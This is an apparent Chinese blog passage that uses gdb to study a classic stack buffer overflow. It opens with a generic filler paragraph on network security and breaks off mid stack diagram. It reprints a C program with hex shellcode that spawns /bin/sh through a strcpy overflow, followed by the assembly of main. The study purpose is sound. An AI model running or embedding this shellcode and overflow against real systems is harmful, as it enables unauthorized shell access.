随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。 以前很少用gdb分析代码, 这回找个最简朴的shellcode练练, 顺便关税, 见笑 1.前辈代码 (<<缓冲区溢出机理分析>>) /*foo1.c * */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); } 2 初始 缓冲区溢出的原理略, 这里我先gcc -S she.c 看了一下main的开头汇编 -------------------------------- main: pushl %ebp /*在这里开始main */ movl %esp,%ebp subl $104,%esp /*buffer+i+long_ptr的总长度是104, 在这里esp一下从ebp移到了栈尾, 实在 就是long_ptr所在处*/ pushl %esi pushl %ebx movl $large_string,-104(%ebp) /*用gdb来break main时断点设到了这一行*/ 用gdb分析得到现在的堆栈情况是 ------------------------------------------------------------------ esp var: |